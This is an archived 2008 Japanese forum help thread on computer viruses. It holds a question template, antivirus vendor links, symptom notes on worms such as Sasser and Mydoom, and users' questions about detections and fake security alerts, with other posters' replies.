【ウィルス情報質問 総合スレッド★Part46】at SEC
【ウィルス情報質問 総合スレッド★Part46】 - 暇つぶし2ch1:名無しさん@お腹いっぱい。
08/10/20 22:57:50
前スレ = 【ウィルス情報質問 総合スレッド★Part45】
スレリンク(sec板)

★質問用テンプレ★
【使用OS】 「」
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「」
【スパイウェア対策ソフト】 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「」

2:名無しさん@お腹いっぱい。
08/10/20 23:00:05
■■ウィルス定義データは定期的に更新しよう■■
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。

最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。

■■ワクチンメーカーリンク集■■  ※ウィルス監視ソフトをワクチンソフトとも呼びます。

・トレンドマイクロ株式会社 URLリンク(www.trendmicro.co.jp)
 製品名:ウイルスバスター2007インターネットセキュリティ他
・株式会社シマンテック URLリンク(www.symantec.com)
 製品名:NortonAntiVirus、NortonInternetSecurity他
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)URLリンク(www.vintage-solutions.com)
製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン URLリンク(www.aladdin.co.jp)<)
 製品名:InocuLAN、CheyenneAntiVirus
・マカフィー株式会社 URLリンク(www.mcafee.com)
 製品名:McAfee VirusScan
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
 URLリンク(www.nai.com) (リンク切れ)
 該当する場合は諦めてノートンかウィルスバスターを買いましょう。

3:名無しさん@お腹いっぱい。
08/10/20 23:00:54
■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
 →常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
 →知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
 →ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
 →アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
 →怪しいファイルにウィルスが混入しているケースもよくあることです。
  怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
 もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
 URLリンク(www.ipa.go.jp)

4:名無しさん@お腹いっぱい。
08/10/20 23:01:59
ボットにご注意!!
ボットとは、コンピュータを悪用することを目的に作られた悪性プログラムで、コンピュータに感染すると、
インターネットを通じて悪意を持った攻撃者(以下「攻撃者」という)が、あなたのコンピュータを外部から遠隔操作します。
感染すると、この攻撃者があなたのコンピュータを操り「迷惑メールの大量配信」、「特定サイトの攻撃」等の迷惑行為をはじめ、
あなたのコンピュータ内の情報を盗み出す「スパイ活動」など深刻な被害をもたらします。
この操られる動作が、ロボット(Robot)に似ているところから、ボット(BOT)と呼ばれています。

ボットに感染したコンピュータは、攻撃者が用意した指令サーバなどに自動的に接続され、
数十~数百万台のボット感染コンピュータを従えた「ボットネットワーク」と言われる巨大ネットワークを形成します。
感染したコンピュータは、攻撃者からの命令を待ち受け、攻撃者が下す命令によって、攻撃者の意のままに数十~数百万台の感染コンピュータが操られた結果、
フィッシング目的などのスパムメールの大量送信や、特定サイトへのDDoS攻撃などに利用され、とても大きな脅威となります。
このため、感染コンピュータを使用しているユーザーは、知らぬ間に犯罪の踏み台にされ、「被害者」であると同時に「加害者」にもなってしまうのです
~サイバークリーンセンター より引用~

サイバークリーンセンター ボットとは
URLリンク(www.ccc.go.jp)
TREND MICRO ボット系ウイルス対策Web
URLリンク(www.trendmicro.com)
インターネット上の新たな脅威「ボット(bot)」に気をつけろ!(上)
URLリンク(itpro.nikkeibp.co.jp)

5:名無しさん@お腹いっぱい。
08/10/20 23:02:41
W32.Sasser.Wormとその亜種にご注意!!
このウイルスは、MS04-011 の悪用を試みるワームです。
ランダムに選択された IPアドレスを持つコンピュータを走査し、拡散します。
亜種も出現しているので、 出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、 ウイルススキャンで検出できません。
最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、 メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
URLリンク(www.microsoft.com)
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
URLリンク(www.microsoft.com)
* Windows XP編
URLリンク(www.microsoft.com)
* Windows 2000編
URLリンク(www.microsoft.com)
* シマンテック
URLリンク(www.symantec.co.jp)
URLリンク(www.symantec.co.jp)
* トレンドマイクロ
URLリンク(www.trendmicro.co.jp)
URLリンク(www.trendmicro.co.jp)
URLリンク(www.trendmicro.co.jp)
URLリンク(www.trendmicro.co.jp)

6:名無しさん@お腹いっぱい。
08/10/20 23:03:36
Blaster / Welchia についての情報
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。

Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
URLリンク(www.microsoft.com)
Blaster トレンドマイクロ
URLリンク(www.trendmicro.co.jp)
Blaster シマンテック
URLリンク(www.symantec.co.jp)
Welchia トレンドマイクロ
URLリンク(www.trendmicro.co.jp)
Welchia シマンテック
URLリンク(www.symantec.co.jp)

7:名無しさん@お腹いっぱい。
08/10/20 23:04:31
「W32/Netsky」ウイルスの亜種(Netsky.Q)に関する情報
URLリンク(www.ipa.go.jp)
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
  * Mail Delivery System (<受取人メールアドレス>)
  * Failure (<受取人メールアドレス>)
  * Delivered Message (<受取人メールアドレス>)
  * Deliver Mail (<受取人メールアドレス>)
  * Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
   例: date7386.pif 、 message19392.zip など

「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
URLリンク(www.ipa.go.jp)
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
  * Error
  * Status
  * Server Report
  * Mail Transaction Failed
  * Mail Delivery System
  * hello
  * hi
  [ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
  "test"
  "The message contains Unicode characters and has been sent as a binary attachment."
  "The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
  "Mail transaction failed. Partial message is available."
  [ 任意の文字列 ]  [ 空白 ]
・添付ファイル名: ランダムなアルファベット

8:名無しさん@お腹いっぱい。
08/10/20 23:05:12
「既出です」Q&A
Q1.ノートンを使っていたら、2chのログからウィルスを発見しました。
   ノートンをインストールしたら2chに書けなくなりました。
A1.ここを読みましょう。
URLリンク(info.2ch.net)

Q2.ウィルスを検出しましたが、どんなウィルスかわかりません
A2.各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
URLリンク(www.symantec.com)
・Trend Micro ウイルス情報
URLリンク(www.trendmicro.co.jp)
・McAfee ウイルス情報
URLリンク(www.mcafeesecurity.com)

Q3.「世界の中心で生まれてきてすいません」という表示が出てきました 。
  デスクトップの背景が蓮画像になってしまいます 。
A3.Winny関連ウィルスですので、Download板へどうぞ。
  ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
Winnyを狙ったワーム・ニュイルス情報 Part67
スレリンク(download板)

Q4.アンチウィルスソフトを持っていないのですが、無料のものはないですか?
A4.このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト最強決定戦!
スレリンク(sec板)

Q5.ホームページが変なページになってしまいます
A5.ウィルスではなくスパイウェアですので、こちらへどうぞ
【総合】スパイウェア予防駆除 Part14
スレリンク(sec板)

9:名無しさん@お腹いっぱい。
08/10/20 23:06:00
感染の疑いがあり自分のアンチウイルスソフトで反応がない場合
他社のオンラインスキャンをするとウイルスが検出されることがあります

カスペルスキー:オンライン ウイルス&スパイウェアスキャナ
URLリンク(www.kaspersky.co.jp)
シマンテック・セキュリティチェック
URLリンク(www.symantec.com)
ウイルスバスターオンラインスキャン
URLリンク(www.trendmicro.co.jp)
トレンド フレックス
URLリンク(trendflexsecurity.jp)
削除可
BitDefender Online Scanner
URLリンク(www.bitdefender.com)
削除可
Panda ActiveScan
URLリンク(www.pandasoftware.com)
削除可
F-Secure オンラインスキャナ
URLリンク(www.f-secure.co.jp)
ウイルスチェイサー for WEB
URLリンク(www.viruschaser.jp)

関連スレッド
無償オンラインスキャンpart3【ウイルス撲滅】
スレリンク(sec板)

※感染している場合ウイルスによっては外部と通信を行うものもありますので
パーソナルファイヤーウォール等でスキャンサイト以外の接続を遮断することをおすすめします

10:名無しさん@お腹いっぱい。
08/10/20 23:10:40
関連スレッド
フリーのアンチウイルスソフト Part18
スレリンク(sec板)
セキュリティ初心者質問スレッドpart113
スレリンク(sec板)
一番いいセキュリティソフトはなんだ!!Part58
スレリンク(sec板)
☆☆トロイの木馬☆☆5台目
スレリンク(sec板)
【PFW】フリーファイアウォールスレPart17
スレリンク(sec板)
【緊急!】ウイルス即行駆除方法【助けて!】Part3
スレリンク(sec板)
【分析】HijackThis【研究】
スレリンク(sec板)
毎日ウィルスメールが送られてくるのですが・・2通目
スレリンク(sec板)
sasser【スタコラサッサ】sasser Part2
スレリンク(sec板)
アンチウィルスソフトのウィルス誤検出
スレリンク(sec板)

関連スレは次スレに移行してる場合もあります。

質問する前に検索しましょう
URLリンク(www.yahoo.co.jp)
URLリンク(www.google.co.jp)

11:名無しさん@お腹いっぱい。
08/10/20 23:53:52
昨日から「GMO MEDIA」って会社が我が家のパソコンのお気に入りを書き換えようとして不正アクセスしてくるんだが対処法あります?
一応ウィルスバスターは先週から使ってるんだが…

あと不正アクセスが酷くてかネット回線に繋がらない…

12:名無しさん@お腹いっぱい。
08/10/22 00:09:25
>>1

13:AntiVirus ◆UiFxBJwtGk
08/10/22 02:05:00
Virus.gr 検出率テスト 2008-06, 1-21 Ιουν?ου
URLリンク(www.virus.gr)
URLリンク(www.virus.gr)

ウィルスウオッチャー (Virus.grに関する説明)
URLリンク(virus-watcher.net)

1. G DATA 2008 ?κδοση 18.2.7310.844 - 99.05%
2. F-Secure 2008 ?κδοση 8.00.103 - 98.75%
3. TrustPort ?κδοση 2.8.0.1835 - 98.06%
4. Kaspersky ?κδοση 8.0.0.357 - 97.95%
5. eScan ?κδοση 9.0.742.1 - 97.44%
6. The Shield 2008 - 97.43%
7. AntiVir ?κδοση 8.1.00.331 Premium - 97.13%
8. Ashampoo ?κδοση 1.61 - 97.09%
9. Ikarus ?κδοση 1.0.82 - 96.05%
10. AntiVir ?κδοση 8.1.00.295 Classic - 95.54%
11. AVG ?κδοση 8.0.100 Free - 94.85%
12. BitDefender 2008 ?κδοση 11.0.16 - 94.70%
13. Avast ?κδοση 4.8.1201 Professional - 93.78%
14. Nod32 ?κδοση 3.0.650.0 - 93.36%
15. F-Prot ?κδοση 6.0.9.1 - 91.87%
16. BitDefender ?κδοση 10 Free - 91.32%
17. ArcaVir 2008 - 88.65%
18. Norman ?κδοση 5.92.08 - 87.72%
19. Vba32 ?κδοση 3.12.6.6 - 87.21%
20. McAfee Enterpise ?κδοση 8.5.0i - 86.57%
21. McAfee ?κδοση 12.0.177 - 86.39%
22. Rising AV ?κδοση 20.46.52 - 85.87%
23. Norton 2008 - 83.34%
24. Dr. Web ?κδοση 4.44.5 - 82.87%
25. Antiy Ghostbusters ?κδοση 5.2.3 - 80.23%

14:AntiVirus ◆UiFxBJwtGk
08/10/22 02:05:37
26. VirusBuster ?κδοση 5.002.62 - 77.19%
27. Outpost ?κδοση 6.0.2294.253.0490 - 75.35%
28. V3 Internet Security ?κδοση 2008.05.31.00 - 75.23%
29. ViRobot Expert ?κδοση 5.5 - 74.50%
30. Virus Chaser ?κδοση 5.0a - 73.65%
31. A-squared Anti-Malware ?κδοση 3.5 - 71.66%
32. PC Tools ?κδοση 4.0.0.26 - 69.82%
33. Trend Micro Antivirus+Antispyware 2008 ?κδοση 16.10.1079 - 67.28%
34. Iolo ?κδοση 4.325 - 63.98%
34. Panda 2008 ?κδοση 3.01.00 - 61.41%
36. Sophos Sweep ?κδοση 7.3.2 - 54.71%
37. ClamWin ?κδοση 0.93 - 54.68%
38. CA Anti-Virus ?κδοση 9.00.170 - 51.08%
39. Quick Heal ?κδοση 9.50 - 47.97%
40. Comodo ?κδοση 2.0.17.58 - 43.15%
41. Trojan Hunter ?κδοση 5.0.962 - 31.39%
42. Solo ?κδοση 7.0 - 21.10%
43. Protector Plus ?κδοση 8.0.C03 - 20.14%
44. PCClear ?κδοση 1.0.8.0 - 19.63%
45. AntiTrojan Shield ?κδοση 2.1.0.14 - 14.74%
46. Trojan Remover ?κδοση 6.6.9 - 13.49%
47. VirIT ?κδοση 6.2.94 - 8.63%
48. True Sword ?κδοση 4.2 - 3.42%
49. Abacre ?κδοση ?κδοση 1.4 - 0.00%

15:名無しさん@お腹いっぱい。
08/10/23 19:22:18
【使用OS】 「windows2000」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2007(8.91.1002/5.613.00)」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「YES」
【スパイウェア対策ソフト】 「ウィルスバスター2007の機能を使用」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「YES」
【ルータの有無】 「有」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「TROJ_IFRAME.CP」
URLリンク(www.trendmicro.co.jp)

某2chスレブログの画像リンクをクリックしたら、ウィルスに感染したとのポップアップが出力しました。
jpgを開くことによってウィルスに感染するケースがあるとは知らなかったので驚きました。
初めて感染してしまったみたいで、私が行った対応で正しいのか教えてください。

感染した旨のポップアップ出力。
→ウィルス情報ページで対応方法を確認し、Temporary Internet Filesの削除
→ウィルスバスターの”隔離ファイルの管理”から、該当のファイルを削除
→スキャンを行い、ウィルスが検出されないことを確認。


トレンドマイクロのウィルス情報で、過去「TROJ_IFRAME.CP」の誤検知があったようですが、
(現在のパターンファイルでは対応済みらしいですが)
”隔離ファイルの管理”から削除しても、今改めて確認したら、まだ残ってました。
誤検知で、気にしなくても良いのか。そうでないなら対応方法が心配です。
どうか、教えてください。おねがいします。

16:15
08/10/23 19:31:45
すみません。少し勘違いしてました。
サイトの画像をクリックして拡大表示しようとした際に感染と出たのですが。
どうやら、”隔離ファイルの管理”に移るのは、サイトの画像をクリックする前のようでした。

1.該当の画像が表示されている、某スレまとめを見る(←ここで隔離ファイルへ)
2.その画像を拡大表示する為にクリック(←感染したポップアップ出力)

こんな感じだと思います。
駆除後に、再度そのサイトを開いた為に”隔離ファイルの管理”に残ったまま と
勘違いしてしまいました。
訂正いたします。

17: ◆0fQkHdNop2
08/10/23 21:41:53
>>15
セキュリティーサポート期間内のWindowsとブラウザーが最新版で
セキュリティーホールがなく、発見された場所がTemporary Internet
Filesならウィルスの心配は99%問題ない。
スパイウェアは変な状況にならねば感染を気にしなくて良いケースが
ほとんど。

18:名無しさん@お腹いっぱい。
08/10/24 21:52:57
>>14
間違っています。
以上。
↓次どうぞ

19:15
08/10/25 16:25:42
>>17
レスありがとうございます。
安心しても大丈夫そうですね。

おかげで助かりました。

20:ぼるじょあ ◆yBEncckFOU
08/10/26 05:01:07
(・3・) エェー こっちもよろしくNE

ぼるじょあ(・3・)質問箱 セキュ板出張所26
スレリンク(sec板)

21:名無しさん@お腹いっぱい。
08/10/26 21:15:40
ウィルススキャンで正常なファイルをウィルスと誤認識してしまうことってあるおでしょうか?
シマンテック・ウルスバスター・マカフィーの3社のオンラインスキャンしたら
同じファイルでもウィルスと認識するところとそうじゃないところがあるんだけど
この場合どうしたらよいんでしょうか?
もし正常なファイルなのに削除してしまって問題あったらイヤだし・・・

22:名無しさん@お腹いっぱい。
08/10/26 22:41:10
どこかに移動して様子見ればいいじゃん

23: ◆N9P3SuvBPo
08/10/26 22:48:21
>21
こういう場合、そのファイルのフルパスまたはプロパティ情報を見てご自身で判断する方法があります。
見るところは、主に「作成日」「著作権」「会社名」で良いと思います。

24:名無しさん@お腹いっぱい。
08/10/26 23:04:53
>>21
つ VirusTotal
つ Jotti's malware scan

25:21
08/10/26 23:08:22
>>23
「作成日」「著作権」「会社名」とも変なところはなかったです
というか>>21の補足ですが、正確には私の使っているウィルスソフト
「Kingsoft Internet Security」の「UPLive.EXE」という自動更新の
アプリケーション(?)にウィルス反応が出たのですが、
ウィルスソフト自体が感染することもあるのでしょうか?

26:21
08/10/26 23:11:30
>>24
ありがとうございます
今から調べてみます

27:21
08/10/26 23:29:37
Jotti's malware scanでスキャンしたら20のうち3つ
(Avast・G DATA・NOD32)でウィルス反応が出ました
1つは「probably a variant of Win32/Genetik 」
2つは「Win32:Jpedrop-B」となっています

28:名無しさん@お腹いっぱい。
08/10/27 08:34:10
今までマカフィーつかってきたのだけど、ほかのソフトに乗りかえようと思ったら、XP SP1で使えるソフトが減っている・・・
何かいいのありませんか?

29:名無しさん@お腹いっぱい。
08/10/27 09:55:18
ネタ・・・だよな?

30:名無しさん@お腹いっぱい。
08/10/27 16:08:16
>>28
馬鹿は氏ね

31:名無しさん@お腹いっぱい。
08/10/27 23:20:30
オク板からきました。
マルチですみませんが、おしえてください。

ヤフーのログイン履歴なんですが、

2008年10月24日(金曜日)14時00分47秒 オークション ログイン 成功 127.0.0.1 パソコン

これって何ですか?

32:名無しさん@お腹いっぱい。
08/10/27 23:28:08
死ね

33:名無しさん@お腹いっぱい。
08/10/30 01:07:29
このファイルをダブルクリックしてしまいました
URLリンク(www1.axfc.net)  pass sage
症状は今のところはっきり現れていません

誰か助けてください。お願い致します

34:名無しさん@お腹いっぱい。
08/10/30 10:58:26
なんのファイルだったの?

35:名無しさん@お腹いっぱい。
08/10/30 14:33:06
二つばかり質問よろしいでしょうか
先程delself.batをくらいまして、システムフォルダを検査したところ
Malwareに感染したkarna.datが見つかったので削除したんですが
これでひとまず安心してよいのでしょうか?

それと、最初に再起動をかけられた時から自動アップデートアイコンの横に
赤丸白バッテンアイコンがあるのですが、これは一体何なんでしょうか…

上記二点につきよろしければご教示頂けませんでしょうか
よろしくお願いいたします

36:名無しさん@お腹いっぱい。
08/10/30 15:07:33
>>35
なんで>>1の質問用テンプレ使わないの?

karna.datしか検出できなかったのならまだ残ってる。
トレイアイコンはVirantixとかFakeAlertとかいうヤツだろ。

37:名無しさん@お腹いっぱい。
08/10/30 17:18:42
>>36
ご返事ありがとうございます
テンプレが無く失礼しました、改めて質問させてください
【使用OS】 「WinXP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスセキリュティゼロ9.5.0362」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「無し」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「無し」
【ルータの有無】 「無し」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Malwareに感染したkarna.dat」

今、Cドライブを検査しているのですが、この場合ですと
どこにウイルスが残留するかお伺いしたいです
この使用ソフトでは検出できないようなウィルスなのでしょうか?

38:名無しさん@お腹いっぱい。
08/10/30 18:15:41
>>37
セキュリティZEROだと残る可能性が高いね。

>>9のオンラインスキャンを試して見たら?
トレンドマイクロは対応してるらしいから、トレンドフレックスで。

39:名無しさん@お腹いっぱい。
08/10/30 19:12:53
>>38
ありがとうございます
早速スキャンを試してみています
実は今まで調べていて、brastk.exeとやらをセーフモードで削除してみたのですが
再起動したら相変わらず赤丸バッテンが出てきて、どうもよくわかりません
このスキャンでキレイになってくれると嬉しいです

40: ◆0fQkHdNop2
08/10/30 21:52:21
>>35
>赤丸白バッテンアイコン


多分、windowsのセキュリティーセンターのアイコンで「赤」は緊急警告
の表示だと思います。(実際に見てないので断言はできませんけど)
ポインターを、そのアイコンの上に軽く当ててセキュリティー警告らしき
表示がでればアイコンをクリックすればwindowsセキュリティーセンターの
画面が表示されて、何をなすべきか表示されると思います。

41: ◆0fQkHdNop2
08/10/30 22:14:41
検索して調べたらkarna.datってダウンローダーみたいですね。

VirSCAN.org記事参照
URLリンク(virscan.org)


downloaderだったら、どこで発見されたかという事とセキュリティーホール
の有無が問題です。
ネットに関係するすべてのソフトが最新でセキュリティーホールがなく
そのマルウェアをクリックせず、発見場所がインターネットのキャッシュ
なら多分セーフですが、そうでないなら危険かもしれません。
危険な場合は、リカバリ推奨ですが、どうしても嫌なら「システムの復元」
ができれば「システムの復元」して、一旦、「システムの復元」無効にし
再度有効、そして、すべてのソフトupdate。

42:名無しさん@お腹いっぱい。
08/10/30 23:15:01
>>40-41
ご助言ありがとうございます
ひとまずオンラインスキャンが終わってから
諸々対応してみたいと思います

ご協力いただいた皆様も、ありがとうございました

43:名無しさん@お腹いっぱい。
08/10/31 00:41:44
連レスですが、無事解決いたしました
スキャンの結果%Windir%\drivers\beep.sys、%System%\dllcache\beep.sys、
%System%\drivers\beep.sysの三つからウイルスが見つかりまして
削除、再びbrastk.exeも削除で赤丸バッテンは消えました
挙動にも問題ございません
>>36でご指摘のとおりフェイクアラートだったようです
URLリンク(www.avira.com)

大変お騒がせ致しました

44:名無しさん@お腹いっぱい。
08/11/01 22:04:16
最近サイトを開くとURLリンク(82.98.235.113)
ファイル未検出とかいうのが一緒にでてくるん
ですけどこれはウィルスと関係あるのですか?
パソコン初心者でなにもわかりません
お願いします。

45:名無しさん@お腹いっぱい。
08/11/01 22:16:29
185 名前:ひよこ名無しさん[] 投稿日:2008/11/01(土) 22:14:11 ID:FXGkGk3i
最近サイトを開くとURLリンク(82.98.235.113)
ファイル未検出とかいうのが一緒にでてくるん
ですけどこれはウィルスと関係あるのですか?
パソコン初心者でなにもわかりません
お願いします。



46:名無しさん@お腹いっぱい。
08/11/02 00:12:47
>>41
システムの復元ってw

47:名無しさん@お腹いっぱい。
08/11/03 19:48:02
>>41
死んでくださいね

48:名無しさん@お腹いっぱい。
08/11/03 20:38:15
>>43
おかしいね。
そのAviraのサイト
URLリンク(www.avira.com)
の説明では、そのフェイクアラートのMD5チェックサムは
9d40e58d4b91df1fdf7afd3b05dba6d6
で、VirusTotalではウィルスセキリュティZEROの元になってるK7AntiVirus
でもTrojan.Win32.Malware.1として対応してるんだけど。
URLリンク(www.virustotal.com)


49:名無しさん@お腹いっぱい。
08/11/04 20:40:27
Au_.exeとかいうのが突然インターネット接続を要求してきたんですけど、これなんだかわかりますか?
パスはC:\Documents and Settings\ユーザー名\Localsettings\temp\~nsu.tmp\AU_.EXEです。
ググってみたらほとんど英語のサイトばかりで、他のプロセスを削除するだとか、HTTPプロトコルを使って他のユーザーと通信するだとか書かれていました。
URLリンク(answers.yahoo.com)

英語にもPCにもめっぽう弱いので詳しい被害や対処法がわからなくて困っています。
どなたか優しい方助けてください。

50:名無しさん@お腹いっぱい。
08/11/04 21:35:25
>>49
一番安全確実なのはリカバリ。
Microsoft updateはカスタムでIE7インストール、その後SP3インストール。
リカバリ後はブラウザーをOperaかFirefox+Noscriptにする事。

どうしても、リカバリが嫌なら、あまり効果を期待はできないが下の方法を試したら?

「システムの復元」ができれば「システムの復元」して、その後
一旦「システムの復元」を無効にして、再度「システムの復元」を
有効にする。それでも悪影響があれば、アダ被記事参考にして
hostファイル対策。
その後、すべてのソフトを最新版にupdate。

URLリンク(www.higaitaisaku.com)
URLリンク(www.higaitaisaku.com)

51:名無しさん@お腹いっぱい。
08/11/04 22:04:38
>>50
回答ありがとうございます。
Au_.exeのプロパティを見てみたら、Jwordインストーラーと書いてありました。
IEのツールバーの検索を利用した時に押し付けられたのかもしれません。
お騒がせしてすいませんでした。

52:名無しさん@お腹いっぱい。
08/11/04 22:37:58
>>51
 それウイルス相当のソフトなので削除が賢明です

53:名無しさん@お腹いっぱい。
08/11/04 23:11:53
上の方に書いてあったとも思うんですけど
ZIPファイルはダウンロードしただけではスパイウェアやウイルスは感染しないという事で良いでしょうか?

54:名無しさん@お腹いっぱい。
08/11/05 07:44:09
うん

55:名無しさん@お腹いっぱい。
08/11/07 00:57:28
すみません。ショートカットキーです。

とあるサイトを見てからずっとショートカットキーです。、語尾に「ショートカットキー」が付いてくるのですがショートカットキーです。・・・

携帯にもウィルスは付くものなのでしょうか?ショートカットキーです。
どなたか教えてください。ショートカットキーです。

56:名無しさん@お腹いっぱい。
08/11/07 01:07:02
>>55
スレチです。

57:名無しさん@お腹いっぱい。
08/11/07 16:57:38
株取引.SCR というウイルスをふんで案の定
C:\Windows\Up\[殺人] <ユーザ名>(yyyymmdd-hhmmss)のメール.zip
が作成されたんですが
それを削除して
もう一度ふんでも
なにも起こりません。
こんなもんなんでしょうか?

58:名無しさん@お腹いっぱい。
08/11/08 00:08:25
基本的なことを質問したいんですが・・

パソコンには ファイアーウォール?というのが元から入ってると思います。
あとセキュリティセンター?もはいってると思うんですが・・
それと セキュリティソフトは全く別の役割をはたすんですか?

ファイアーウォールは基本的には何から守ってくれてるんでしょうか?
あとJCOMでホームページウイルススキャンサービスに入ってるんですが
それだけでは ウイルスからは守られてないんでしょうか?

59:名無しさん@お腹いっぱい。
08/11/08 00:27:40
>>58
URLリンク(www.google.co.jp)


      _______                     __
    // ̄~`i ゝ                    `l |
    / /        ,______   ,_____    ________  | |  ____ TM
   | |     ___ // ̄ヽヽ // ̄ヽヽ (( ̄))   | | // ̄_>>
   \ヽ、   |l | |    | | | |    | |  ``( (.  .| | | | ~~
      `、二===-'  ` ===' '  ` ===' '  // ̄ヽヽ |__ゝ ヽ二=''
                         ヽヽ___//   日本
  _____ _____  ______  _______
  |  ウェブ  | | イメージ | | グループ | | ディレクトリ |
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       ._________________
      |ファイアーウォール            │・検索オプション
      └────────┘・表示設定
         | Google検索 | I'm Feeling Lucky |  ・言語ツール
          ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       ○ウェブ全体から検索 ◎日本語のページを検索

60:名無しさん@お腹いっぱい。
08/11/08 00:41:31
>>58
ファイアーウォール(防火壁)とは、ある特定のコンピュータネットワークとその外部との通信を制御し
内部のコンピュータネットワークの安全を維持することを目的としたソフトウェア、あるいはそのソフトウェアを搭載したハードウェアである。
外部から内部のコンピュータネットワークへ侵入しようとするクラッキング行為を火事にたとえ、それを食い止めるものとして防火壁という表現を用いている。

>あとJCOMでホームページウイルススキャンサービスに入ってるんですが
>それだけでは ウイルスからは守られてないんでしょうか?
うん。


61:名無しさん@お腹いっぱい。
08/11/08 09:35:45
>>59 吹きましたw
>>60
回答ありがとうございます!!

ファイアーウォールだけでは守りが不十分だからノートンとかをいれたほうがいいんですよね?

62:名無しさん@お腹いっぱい。
08/11/08 09:37:58
あとファイアーウォールは必ずどのpcにも入ってるんですよね?

63: ◆0fQkHdNop2
08/11/08 09:40:17
>>58・・・・・>>60氏の回答に補足しとく。

JCOMのホームページウイルススキャンサービスだけではUSBやFD経由の
ウィルスは防止できないので、JCOMのユーザー無料サービスの
マイシールド(多分、アンラボのInternet Security )もダウンロード
してインストールしたら良い。
ついでに、メールウイルススキャンサービスと迷惑メール撃退サービスも
利用したら良い。

64:名無しさん@お腹いっぱい。
08/11/08 10:42:00
>>63
なるほど!
マイシ導入しておきます・・!

65: ◆0fQkHdNop2
08/11/08 11:02:43
>>61・・・・・>>61見ずに>>63投稿したので補足。

マイシールドをインストールするならノートンは入れる必要ない。
両方入れると不具合が起きるので、どちらか一方にすべきだ。
金持ちで金が余ってて、セキュリティー重視するなら、マイシールドより
ノートン・インターネットセキュリティー2009が良いけど、普通の人間の
場合は常識的に考えたらJCOMのユーザー無料サービスのマイシールド
選択が得だしプロバイダーのサポートも受けやすい。

66:名無しさん@お腹いっぱい。
08/11/08 13:32:26
悪意が潜在するプログラム Suspicious Driver Installation

オンゲしてたらフリートライアルのカスペがこんなの見つけたんだ
ググったけど意味がよくわからない
これって放置しててもいいのかな? 誰かお願いします

67: ◆0fQkHdNop2
08/11/08 14:03:27
>>66
カスペ・スレかゲーム関係の板のそのゲームのスレで聞いた方が良いと思う。

そのゲームが安全なゲームだとすれば、ゲームソフトのドライバーの
可能性が高いようにも思えるが、そのゲームもカスペの対応も知らないので
断言できない。ゲームソフトにセキュリティーホールがあってポート解放
してたらマルウェア入れられる可能性もあるかもしれない。

